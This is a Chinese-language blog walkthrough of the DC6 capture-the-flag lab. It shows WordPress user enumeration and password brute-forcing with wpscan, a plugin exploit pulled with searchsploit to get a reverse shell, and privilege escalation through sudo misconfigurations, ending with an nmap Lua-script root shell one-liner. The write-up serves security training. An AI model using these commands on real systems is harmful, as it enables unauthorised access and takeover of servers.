DC6:WordPress漏洞利用和nmap提权


靶机下载地址

1.信息收集

nmap扫描端口:

访问80端口,根据靶机下载页面提示,修改/etc/hosts文件:

是熟悉的wordpress页面

2.WordPress枚举

利用wpscan工具,对WordPress进行扫描。

用户枚举

wpscan --url http://wordy/ -e u 

密码爆破

靶机下载页提示了爆破字典,所以应该是需要爆破的。

生成字典:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破账户密码:

wpscan --url http://wordy/ --passwords passwords.txt --usernames admin,graham,mark,sarah,jens

爆破成功:

用账密信息:mark / helpdesk01 登录wordpress:

3.WordPress插件漏洞利用

使用了这个插件Activity monitor:

利用Activity monitor 的exploit ,用以下命令可以把exploit复制到当前目录(45274为exploit的id):

searchsploit -m 45274 

修改该html文件:

然后打开html文件,在mark用户登录的前提下,点击按钮,得到反弹shell。

4.提权

当前的用户为www-data,查看/home文件夹查看用户文件:

查看mark用户的stuff文件夹查看things-to-do.txt文件:

发现账密信息:graham - GSo7isUM1D4

用这个账密信息链接SSH:

当前为graham用户,查看sudo列表,发现可执行jens用户的backups.sh文件。

修改backups.sh文件:

用以下命令执行,提权到jens用户:

sudo -u jens /home/jens/backups.sh

然后查看该用户的sudo列表,发现nmap拥有root权限:

nmap shell 获取方法

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

成功提权到root权限,获取到flag!

5.总结

这个靶机主要考察以下知识点:

  • WordPress应用的用户枚举和密码爆破,wpscan工具的使用;
  • WordPress插件漏洞利用;
  • nmap应用提权。

文章作者: Summer One
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Summer One !
  目录